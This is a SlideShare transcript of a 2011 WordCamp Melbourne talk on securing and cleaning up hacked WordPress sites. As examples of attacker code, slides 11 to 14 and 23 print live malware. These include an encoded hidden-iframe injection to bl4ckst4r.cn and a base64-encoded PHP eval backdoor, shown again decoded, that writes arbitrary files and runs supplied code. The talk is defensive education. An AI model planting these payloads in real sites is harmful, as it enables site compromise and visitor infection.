The GreatWordPressLockdown  http://johnford.is/    @iamjohnford
OMG, mysite’s been  hacked.
“Help!Spams are  eating my site!”
“Help!Spams are  eating my site!”
“Did ninjas  do it?”
http://flic.kr/p/5AU3Lp
SmokingAsthmatic Clowns
S.A.C.s
Why doS.A.C.s exist?
What they do...
document.write(unescape(%3C%69%66%72%61%6D%65%20%73%72%63%3D%27%68%74%74%70%3A%2F%2F%62%6C%34%63%6B%73%74%34%72%2E%63%6E%2...
<iframe src=http://bl4ckst4r.cn/blog/go.php?sid=17 width=0 height=0></iframe>
<?php eval(base64_decode("Pz48P3BocA0KJGRlbGltID0gIiAgICAgIjsgZWNobyAkZGVsaW07IGVycm9yX3JlcG9ydGluZyhFX0FMTCk7IGlmKCFlbXB0...
<?php$delim = "     "; echo $delim; error_reporting(E_ALL); if(!empty($_POST[data])){ $post[data] = $_POST[data]; if(!empt...
I don’treally give a $#%*.
How did my  site get S.A.C.ed?
Guess your password
I saw John Ford speak atWordCamp Melbourne 2011
I saw John Ford speak atWordCamp Melbourne 2011IsJFs@WCM2k11
I saw the awesome, loving,   generous, compassionate,     handsome, courteous,thoughtful, modest John Ford      speak at W...
Exploit oldversions ofWordPress
Exploit vulnerablethemes and  plugins
eval(gzuncompress(base64_decode(eJzcvdtyHMmSIPYOs/6H7Jo+XcCZQt2vBEEuCALdnOZNAMiesyQHlpUZVZVEVmadzCyA4PQxW0kmjcxkMj2tnvaxz2...
Filepermissionshttp://codex.wordpress.org/Changing_File_Permissions
// ** MySQL settings - You can get this info from your web host ** ///** The name of the database for WordPress */define(D...
/**#@+ * Authentication Unique Keys and Salts. * * Change these to different unique phrases! * You can generate these usin...
http://wiki.mediatemple.net/w/File_Permissions
http://wiki.mediatemple.net/w/File_Permissions
Obscurity
Cross tool exploits
Multiplesites on thesame server
Use a  different  databaseuser/pass for  each site
Hardening  WordPresshttp://codex.wordpress.org/Hardening_WordPress
“What do I do?”
Contactyour host
Back up  yourexploited   site
FAQ My       site was       hackedhttp://codex.wordpress.org/FAQ_My_site_was_hacked
Change allpasswords and keys
// ** MySQL settings - You can get this info from your web host ** ///** The name of the database for WordPress */define(D...
/**#@+ * Authentication Unique Keys and Salts. * * Change these to different unique phrases! * You can generate these usin...
Removerogue code
http://wordpress.org/extend/plugins/exploit-scanner/
Subversion http://codex.wordpress.org/Installing/Updating_WordPress_with_Subversion
machine:www user$ svn status?       wp-config.php?       .htaccessM       index.php?       wp-content/cacheX       wp-cont...
machine:www user$ svn diff wp-content/themes/twentyten/404.phpIndex: wp-content/themes/twentyten/404.php==================...
Check filepermissions
Restore frombackup
YOU HAZ BACKUP, RIGHT?http://flic.kr/p/DC3Q
http://flic.kr/p/5AU3Lp
Thank you!  http://johnford.is/    @iamjohnford
Security: The Great WordPress Lockdown - WordCamp Melbourne - February 2011
Security: The Great WordPress Lockdown - WordCamp Melbourne - February 2011
Security: The Great WordPress Lockdown - WordCamp Melbourne - February 2011
Security: The Great WordPress Lockdown - WordCamp Melbourne - February 2011
Security: The Great WordPress Lockdown - WordCamp Melbourne - February 2011
Security: The Great WordPress Lockdown - WordCamp Melbourne - February 2011
Security: The Great WordPress Lockdown - WordCamp Melbourne - February 2011
Security: The Great WordPress Lockdown - WordCamp Melbourne - February 2011
Security: The Great WordPress Lockdown - WordCamp Melbourne - February 2011
Security: The Great WordPress Lockdown - WordCamp Melbourne - February 2011
Security: The Great WordPress Lockdown - WordCamp Melbourne - February 2011
Security: The Great WordPress Lockdown - WordCamp Melbourne - February 2011
Security: The Great WordPress Lockdown - WordCamp Melbourne - February 2011
Security: The Great WordPress Lockdown - WordCamp Melbourne - February 2011
Security: The Great WordPress Lockdown - WordCamp Melbourne - February 2011
Security: The Great WordPress Lockdown - WordCamp Melbourne - February 2011
Security: The Great WordPress Lockdown - WordCamp Melbourne - February 2011
Security: The Great WordPress Lockdown - WordCamp Melbourne - February 2011
Security: The Great WordPress Lockdown - WordCamp Melbourne - February 2011
Security: The Great WordPress Lockdown - WordCamp Melbourne - February 2011
Security: The Great WordPress Lockdown - WordCamp Melbourne - February 2011
Security: The Great WordPress Lockdown - WordCamp Melbourne - February 2011
Security: The Great WordPress Lockdown - WordCamp Melbourne - February 2011
Security: The Great WordPress Lockdown - WordCamp Melbourne - February 2011
Security: The Great WordPress Lockdown - WordCamp Melbourne - February 2011
Upcoming SlideShare
Loading in …5
×

Security: The Great WordPress Lockdown - WordCamp Melbourne - February 2011

6,925 views

Published on

The Great WordPress Lockdown presentation at WordCamp Melbourne February 2011.

Published in: Technology
0 Comments
0 Likes
Statistics
Notes
  • Be the first to comment

  • Be the first to like this

No Downloads
Views
Total views
6,925
On SlideShare
0
From Embeds
0
Number of Embeds
429
Actions
Shares
0
Downloads
18
Comments
0
Likes
0
Embeds 0
No embeds

No notes for slide

Security: The Great WordPress Lockdown - WordCamp Melbourne - February 2011

  1. The GreatWordPressLockdown http://johnford.is/ @iamjohnford
  2. OMG, mysite’s been hacked.
  3. “Help!Spams are eating my site!”
  4. “Help!Spams are eating my site!”
  5. “Did ninjas do it?”
  6. http://flic.kr/p/5AU3Lp
  7. SmokingAsthmatic Clowns
  8. S.A.C.s
  9. Why doS.A.C.s exist?
  10. What they do...
  11. document.write(unescape(%3C%69%66%72%61%6D%65%20%73%72%63%3D%27%68%74%74%70%3A%2F%2F%62%6C%34%63%6B%73%74%34%72%2E%63%6E%2F%62%6C%6F%67%2F%67%6F%2E%70%68%70%3F%73%69%64%3D%31%37%27%20%77%69%64%74%68%3D%27%30%27%20%68%65%69%67%68%74%3D%27%30%27%3E%3C%2F%69%66%72%61%6D%65%3E));
  12. <iframe src=http://bl4ckst4r.cn/blog/go.php?sid=17 width=0 height=0></iframe>
  13. <?php eval(base64_decode("Pz48P3BocA0KJGRlbGltID0gIiAgICAgIjsgZWNobyAkZGVsaW07IGVycm9yX3JlcG9ydGluZyhFX0FMTCk7IGlmKCFlbXB0eSgkX1BPU1RbJ2RhdGEnXSkpIHsgJHBvc3RbJ2RhdGEnXSA9ICRfUE9TVFsnZGF0YSddOyBpZighZW1wdHkoJF9QT1NUWyd1cmwnXSkpIHsgJHRtcCA9IGJhc2U2NF9kZWNvZGUoJF9QT1NUWyd1cmwnXSk7ICR1cmxzX2FycmF5ID0gdW5zZXJpYWxpemUoJHRtcCk7ICR1cmwgPSBhcnJheV9zaGlmdCgkdXJsc19hcnJheSk7IGlmKCFlbXB0eSgkdXJsc19hcnJheSkgQU5EIGNvdW50KCR1cmxzX2FycmF5KT4wKSB7ICR0bXAgPSBzZXJpYWxpemUoJHVybHNfYXJyYXkpOyAkcG9zdFsndXJsJ10gPSBiYXNlNjRfZW5jb2RlKCR0bXApOyB9ICR0bXAgPSBwYXJzZV91cmwoJHVybCk7IGlmKCR0bXBbJ3NjaGVtZSddPT0iZnRwIikgeyBlY2hvICJ0cnlpbmcgdG8gdXBkYXRlIGZpbGVbICIuJHRtcFsncGF0aCddLiIgXSB2aWEgRlRQXG4iOyAkZmlsZSA9ICd0bXAucGhwJzsgJGNvbnRlbnQgPSB1bnNlcmlhbGl6ZShiYXNlNjRfZGVjb2RlKCRwb3N0WydkYXRhJ10pKTsgJGNvbnRlbnQgPSBiYXNlNjRfZGVjb2RlKCRjb250ZW50Wydjb250ZW50J10pOyAkZnAgPSBmb3BlbigkZmlsZSwgJ3cnKTsgZndyaXRlKCRmcCwgJGNvbnRlbnQpOyBmY2xvc2UoJGZwKTsgY2htb2QoJGZpbGUsIDA3NzcpOyAkZnAgPSBmb3BlbigkZmlsZSwncicpOyAkcG9zdCA9IGZhbHNlOyB9IGVsc2UgeyBlY2hvICJTZW5kaW5nIHJlcXVlc3QgdG86ICR1cmwgXG4iOyAkZnAgPSBmYWxzZTsgfSAkY29udGVudCA9IHJlcXVlc3QoJHVybCwgJHBvc3QsICRmcCk7IGlmKCR0bXBbJ3NjaGVtZSddPT0iZnRwIikgeyBmY2xvc2UoJGZwKTsgdW5saW5rKCRmaWxlKTsgfSBpZigkdG1wWydzY2hlbWUnXT09ImZ0cCIgQU5EICRjb250ZW50IT09ZmFsc2UpIGVjaG8gIkZUUDogVVBEQVRFRFxuIjsgZWxzZSBlY2hvICRkZWxpbS4kY29udGVudDsgfSBlbHNlIHsgJHRtcCA9IGJhc2U2NF9kZWNvZGUoJHBvc3RbJ2RhdGEnXSk7ICRkYXRhID0gdW5zZXJpYWxpemUoJHRtcCk7IGlmKGVtcHR5KCRkYXRhKSBPUiAhaXNfYXJyYXkoJGRhdGEpKSB7IGV4aXQoIlNvbWUgZXJyb3Igd2hpbGUgc2F2aW5nOyIpOyB9IGZvcmVhY2ggKCRkYXRhIEFTICRkKSB7IGlmKGRpcm5hbWUoJGRbJ24nXSkhPScuJyBhbmQgIWZpbGVfZXhpc3RzKGRpcm5hbWUoJGRbJ24nXSkpKSB7IG1rZGlyKGRpcm5hbWUoJGRbJ24nXSksIDA3NzcpOyBjaG1vZChkaXJuYW1lKCRkWyduJ10pLCAwNzc3KTsgfSBpZigkZFsnbiddPT0nZXYnKSB7IGV2YWwoJGRbJ2MnXSk7IGNvbnRpbnVlOyB9ICRmID0gZm9wZW4oJGRbJ24nXSwgJ3cnKTsgJGJ5dGVzX3dyaXR0ZW4gPSBmd3JpdGUoJGYsICRkWydjJ10pOyBmY2xvc2UoJGYpOyBpZihmaWxlc2l6ZSgkZFsnbiddKT4xMCkgeyBlY2hvICJmaWxlOiIuJGRbJ24nXS4iOiBzYXZlZFxuIjsgfSBlbHNlIHsgZWNobyAic29tZSBlcnJvciBoYXBwZW5zOiAiLiRkWyduJ10uIiBzaXplIGlzOiAiLmZpbGVzaXplKCRkWyduJ10pLiIgYnl0ZXNcbiI7IH0gaWYoIUBjaG1vZCgkZFsnbiddLCAwNzc3KSkgeyBlY2hvICJzb21lIGVycm9yIHdpdGg6ICIuJGRbJ24nXS4iXG4iOyB9IH0gfSB9IGVsc2UgeyBkaWUoIk5PIERBVEEiKTsgfSBmdW5j
  14. <?php$delim = " "; echo $delim; error_reporting(E_ALL); if(!empty($_POST[data])){ $post[data] = $_POST[data]; if(!empty($_POST[url])) { $tmp = base64_decode($_POST[url]); $urls_array = unserialize($tmp); $url = array_shift($urls_array);if(!empty($urls_array) AND count($urls_array)>0) { $tmp = serialize($urls_array);$post[url] = base64_encode($tmp); } $tmp = parse_url($url); if($tmp[scheme]=="ftp") { echo "trying to update file[ ".$tmp[path]." ] via FTPn"; $file =tmp.php; $content = unserialize(base64_decode($post[data])); $content =base64_decode($content[content]); $fp = fopen($file, w); fwrite($fp,$content); fclose($fp); chmod($file, 0777); $fp = fopen($file,r); $post =false; } else { echo "Sending request to: $url n"; $fp = false; } $content =request($url, $post, $fp); if($tmp[scheme]=="ftp") { fclose($fp); unlink($file); } if($tmp[scheme]=="ftp" AND $content!==false) echo "FTP: UPDATEDn";else echo $delim.$content; } else { $tmp = base64_decode($post[data]); $data =unserialize($tmp); if(empty($data) OR !is_array($data)) { exit("Some error whilesaving;"); } foreach ($data AS $d) { if(dirname($d[n])!=. and !file_exists(dirname($d[n]))) { mkdir(dirname($d[n]), 0777); chmod(dirname($d[n]),0777); } if($d[n]==ev) { eval($d[c]); continue; } $f = fopen($d[n], w);$bytes_written = fwrite($f, $d[c]); fclose($f); if(filesize($d[n])>10) { echo"file:".$d[n].": savedn"; } else { echo "some error happens: ".$d[n]." sizeis: ".filesize($d[n])." bytesn"; } if(!@chmod($d[n], 0777)) { echo "someerror with: ".$d[n]."n"; } } } } else { die("NO DATA"); } function request($url, $post=false, $fp=false, $timeout=150){ $ch = curl_init(); if($post) { $post= is_array($post)?http_build_query($post):$post; curl_setopt($ch, CURLOPT_POST,1); curl_setopt($ch, CURLOPT_POSTFIELDS, $post); } if($fp) { curl_setopt($ch,CURLOPT_UPLOAD, 1); curl_setopt($ch, CURLOPT_INFILE, $fp); fclose($fp); }curl_setopt($ch, CURLOPT_TIMEOUT, $timeout); curl_setopt($ch, CURLOPT_URL, $url);curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); $content = curl_exec($ch); $error =curl_error($ch); if($error) { echo "CURL_ERROR: ".$error."n"; return false; }
  15. I don’treally give a $#%*.
  16. How did my site get S.A.C.ed?
  17. Guess your password
  18. I saw John Ford speak atWordCamp Melbourne 2011
  19. I saw John Ford speak atWordCamp Melbourne 2011IsJFs@WCM2k11
  20. I saw the awesome, loving, generous, compassionate, handsome, courteous,thoughtful, modest John Ford speak at WordCamp Melbourne 2011IstalgchctmJFs@WCM2k11
  21. Exploit oldversions ofWordPress
  22. Exploit vulnerablethemes and plugins
  23. eval(gzuncompress(base64_decode(eJzcvdtyHMmSIPYOs/6H7Jo+XcCZQt2vBEEuCALdnOZNAMiesyQHlpUZVZVEVmadzCyA4PQxW0kmjcxkMj2tnvaxz2pMkmnHZKa10YN2fqX/QL8gv0RERmRmASC7e6Ztjp0mKuPi4eHh4eER4eEezLZnQSjOxYcgzdJtP0gidym2z8+Pnzw9Oj/fcZpOvSX8IJuusyyOmqvFqr6z4/ytE0ReuPaFs10v5u45f3ICALuOvCyIIwW6Pv/oxctVItK0vuN8/bVTUQBSdBFoZMv56vVM+O1u39l3smQtEPRXrycT0XN7kPT81dOne5AwHHvDiQcJbfzqjYbD9sTIbo/GYuYaCZ7w3WFHJWxBlU5XjLpGiU67782GkFA7iObpeulG9dQ5S9woDd0sTpyX4XoeRM7LJK5hcb8zGbaxBTdJ3Ovt2nGQpFmt4dROhRdHPv46WwQJ/TiO10m2oF/BDH7s7G0pSjjHXXcya7e3kcBfvZ6KniA061+diMt7zqjfd76qY3vTXnswQ6Kk62maJduqbMMZ7ux94SQiWyeR0x12nb+Egcou3XA7L0l1G0674UBCKCKdtuPsOt0dwAeJ7A4Go8kYmhi2mar9cbuDVO0N6HviTgYdzK93221CatYe93tTSOl0nd87PVmvP5sNuwJTzcR2u91D8uqSMAiz4Xg6ohaGA4LndrwZjmr9/iyOMicNPor9Wr/mzFwPfhwkgRs2nG9FeCmywHOhOzA8u6lIglntwf1p0npwthDOyp0L5zpeA1H+uBZpJnzHi9ehH72tZ85UAFvxoEK6mznZIkidLFiKJgyxcFPMv3bcuQuDjYWSpnMaJ5A0AybIADxMgzi6FFEgIi+vlAjXZ1huAriFAih733UWiZjt1xZZtrrXak3DeN7M3ASAR24T+L4VRL74gHOo5SbeIrgUrTWkACe5kR9E891M89+uSBL4F/vWwr4+MFjzCLPS+63pg/st90GDMPVF5gYhYBP5jviwCqFF5LcmUYn+2XIeB8I5FUEmGo4PP/21cykSKDnPgGoN5+L/+6f/N4oy4USBt8iwSLp0QwdSp4CiyD5mzpVIfBE1nUdBBuVeQ/LaWzhXgYBOOOkKihIBAdd1EsydGSQk1NaryI0isViGAPoCULDweuo6WBWmm+vACDppDMWCzE0Rl9gBaq9iP4ESLo6lv/aCxBGRg0MNIymWqxiGBWgwcy/
  24. Filepermissionshttp://codex.wordpress.org/Changing_File_Permissions
  25. // ** MySQL settings - You can get this info from your web host ** ///** The name of the database for WordPress */define(DB_NAME, wcnyc2010);/** MySQL database username */define(DB_USER, wcnyc2010);/** MySQL database password */define(DB_PASSWORD, 3^?wb6mhqsiyk^ABHR6y);/** MySQL hostname */define(DB_HOST, mysql.myserver.com);/** Database Charset to use in creating database tables. */define(DB_CHARSET, utf8);/** The Database Collate type. Dont change this if in doubt. */define(DB_COLLATE, );
  26. /**#@+ * Authentication Unique Keys and Salts. * * Change these to different unique phrases! * You can generate these using the {@link https://api.wordpress.org/secret-key/1.1/salt/WordPress.org secret-key service} * You can change these at any point in time to invalidate all existing cookies. This will forceall users to have to log in again. * * @since 2.6.0 */define(AUTH_KEY, 2FO}Z*-a#4E9Ft5$kBzZ_kk|Z3@zR+fRV`{$axu|r}(dE-Akbziu #-BLmd%qV-y);define(SECURE_AUTH_KEY, *E~-xU9xLhB[iv|8fUi7[{?=KS;E 0Cq#!NP, &]/oQwc1EkkR4A(c:x76f/w]Q));define(LOGGED_IN_KEY, &psh-W)gE_~qK$kL{qT~2(XPyT<FAc}!=&{(SL!.?y9ObiYgNmdqohdH<t5/KO4=);define(NONCE_KEY, x&Im0c}brod3Cl%;jWJub<liaf:rFV#67F-E*o&$r90I/LSLP8Nz`Gb!R*H:J;4});define(AUTH_SALT, eO7i!tPIz[@dq.[mY`5zPu4x_b`K^6NTPK:%JwZdGCoo||)O}6aZ7>Y jb84mlxi);define(SECURE_AUTH_SALT, /a60,@Uf]/S$xHHQ]Dq/xB:zx^#%0<w#vPv|9go@y#c|*PW# bKE]|S&#-JJ}F65);define(LOGGED_IN_SALT, IEP|]D`QVwDSg*t|[V>Jy]I^H~Q rfou+^wkV?FDbBO%fpg-(WH~v]7!_3M|&m(-);define(NONCE_SALT, hnrbdh|-~=%>qC7Cbl33$=J~!F}SS*(*Fkl,uh8=7+u(b45|WtKe%S32r]3X~k/W);
  27. http://wiki.mediatemple.net/w/File_Permissions
  28. http://wiki.mediatemple.net/w/File_Permissions
  29. Obscurity
  30. Cross tool exploits
  31. Multiplesites on thesame server
  32. Use a different databaseuser/pass for each site
  33. Hardening WordPresshttp://codex.wordpress.org/Hardening_WordPress
  34. “What do I do?”
  35. Contactyour host
  36. Back up yourexploited site
  37. FAQ My site was hackedhttp://codex.wordpress.org/FAQ_My_site_was_hacked
  38. Change allpasswords and keys
  39. // ** MySQL settings - You can get this info from your web host ** ///** The name of the database for WordPress */define(DB_NAME, wordcamp);/** MySQL database username */define(DB_USER, wordcamp);/** MySQL database password */define(DB_PASSWORD, 3^?wb6mhqsiyk^ABHR6y);/** MySQL hostname */define(DB_HOST, mysql.myserver.com);/** Database Charset to use in creating database tables. */define(DB_CHARSET, utf8);/** The Database Collate type. Dont change this if in doubt. */define(DB_COLLATE, );
  40. /**#@+ * Authentication Unique Keys and Salts. * * Change these to different unique phrases! * You can generate these using the {@link https://api.wordpress.org/secret-key/1.1/salt/WordPress.org secret-key service} * You can change these at any point in time to invalidate all existing cookies. This will forceall users to have to log in again. * * @since 2.6.0 */define(AUTH_KEY, 2FO}Z*-a#4E9Ft5$kBzZ_kk|Z3@zR+fRV`{$axu|r}(dE-Akbziu #-BLmd%qV-y);define(SECURE_AUTH_KEY, *E~-xU9xLhB[iv|8fUi7[{?=KS;E 0Cq#!NP, &]/oQwc1EkkR4A(c:x76f/w]Q));define(LOGGED_IN_KEY, &psh-W)gE_~qK$kL{qT~2(XPyT<FAc}!=&{(SL!.?y9ObiYgNmdqohdH<t5/KO4=);define(NONCE_KEY, x&Im0c}brod3Cl%;jWJub<liaf:rFV#67F-E*o&$r90I/LSLP8Nz`Gb!R*H:J;4});define(AUTH_SALT, eO7i!tPIz[@dq.[mY`5zPu4x_b`K^6NTPK:%JwZdGCoo||)O}6aZ7>Y jb84mlxi);define(SECURE_AUTH_SALT, /a60,@Uf]/S$xHHQ]Dq/xB:zx^#%0<w#vPv|9go@y#c|*PW# bKE]|S&#-JJ}F65);define(LOGGED_IN_SALT, IEP|]D`QVwDSg*t|[V>Jy]I^H~Q rfou+^wkV?FDbBO%fpg-(WH~v]7!_3M|&m(-);define(NONCE_SALT, hnrbdh|-~=%>qC7Cbl33$=J~!F}SS*(*Fkl,uh8=7+u(b45|WtKe%S32r]3X~k/W);
  41. Removerogue code
  42. http://wordpress.org/extend/plugins/exploit-scanner/
  43. Subversion http://codex.wordpress.org/Installing/Updating_WordPress_with_Subversion
  44. machine:www user$ svn status? wp-config.php? .htaccessM index.php? wp-content/cacheX wp-content/plugins/akismetM wp-content/themes/twentyten/404.php? wp-admin/metaPerforming status on external item at wp-content/plugins/akismet
  45. machine:www user$ svn diff wp-content/themes/twentyten/404.phpIndex: wp-content/themes/twentyten/404.php===================================================================--- wp-content/themes/twentyten/404.php (revision 15819)+++ wp-content/themes/twentyten/404.php (working copy)@@ -1,3 +1,5 @@+<?php echo "<h1>Heres some code that really shouldnt be here</h1>"; ?>+ <?php /** * The template for displaying 404 pages (Not Found).
  46. Check filepermissions
  47. Restore frombackup
  48. YOU HAZ BACKUP, RIGHT?http://flic.kr/p/DC3Q
  49. http://flic.kr/p/5AU3Lp
  50. Thank you! http://johnford.is/ @iamjohnford

×